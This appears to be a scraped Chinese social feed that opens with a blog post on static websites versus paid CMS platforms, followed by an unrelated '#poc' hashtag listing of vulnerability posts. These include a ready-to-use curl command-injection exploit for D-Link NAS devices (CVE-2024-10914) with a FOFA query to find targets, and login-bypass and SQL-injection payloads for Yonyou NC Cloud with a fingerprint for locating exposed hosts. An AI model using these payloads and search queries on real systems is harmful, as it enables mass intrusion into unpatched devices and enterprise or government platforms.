静态网站悖论 个人网站的两种不同实现方式:一种是复杂的内容管理系统(CMS),另一种是简单的静态 HTML 文件。文章指出,尽管大多数普通用户倾向于使用复杂的解决方案(如 WordPress),但实际上,只有少数专业软件工程师能够选择更简单的静态网站。 via HackerNews 2024 10 09 前两天刚好听朋友说 square space 已经涨到了近乎搞笑的 $25 月费,做不用来盈利的个人博客实在难以 justify。这篇文章中吐槽得很在点子上: normal users are stuck with a bunch of greedy clowns that make them pay for every little thing, all while wasting ungodly amounts of computational power to render what could have been a static website in 99% of cases. 普通用户被困在了一群屁大点功能都要收费的贪婪小丑手里,与此同时浪费着人神共愤额度的算力来渲染 99% 的情况下都可以作为静态的网站。 当然原文中说的“只有少数专业软件工程师才能选择更简单的静态网站”略微夸张并不认同,因为静态站至少是比 self-host 的动态 CMS 少太多维护了。我的 backlog 里也一直躺了篇安利新手用静态站并拉踩 WP 的文,不过网上这种文已经有无数了也还是拦不住前赴后继往各种 CMS 的坑里冲的新手,觉得写了又有什么意义呢就还搁着没写。(当然迟早会像以前反复造的无数轮子一样被废话欲战胜的 but not today) #indieblog#newletter
Hashtags
搜索 #poc
D-Link NAS 设备中发现了一个严重漏洞 CVE-2024-10914,对全球超过 61,000 个系统构成严重风险。该漏洞是 account_mgr.cgi 脚本中的命令注入漏洞,允许远程攻击者通过特制的 HTTP GET 请求执行任意命令 Exploit: curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27" Affected Devices: DNS-320 – Version 1.00 DNS-320LW – Version 1.01.0914.2012 DNS-325 – Versions 1.01 and 1.02 DNS-340L – Version 1.08 Search query: FOFA: app="D_Link-DNS-ShareCenter" #poc
Hashtags
泛微e-Mobile 移动管理平台/client/cdnfile存在任意文件读取漏洞 #poc
Hashtags
H3C CAS fd前台任意文件上传漏洞 #poc
Hashtags
数字通指尖云平台-智慧政务存在登录绕过漏洞 #poc
Hashtags
天融信运维安全审计系统synRequest存在远程命令执行漏洞 #poc
Hashtags
#poc
Hashtags
#poc
Hashtags
用友NC Cloud 0Day漏洞 Hunter指纹: web.icon=="a5dccf6af79f420f7ea2f2becb6fafa5" 登录绕过漏洞 Payload: mp/loginxietong?username=admin SQL注入漏洞 Payload: portal/pt/PaWfm/open?pageId=login&proDefPk=1* #poc
Hashtags
#poc
Hashtags
#poc
Hashtags
#poc
Hashtags
v10 channel反序列化打hsql #poc
Hashtags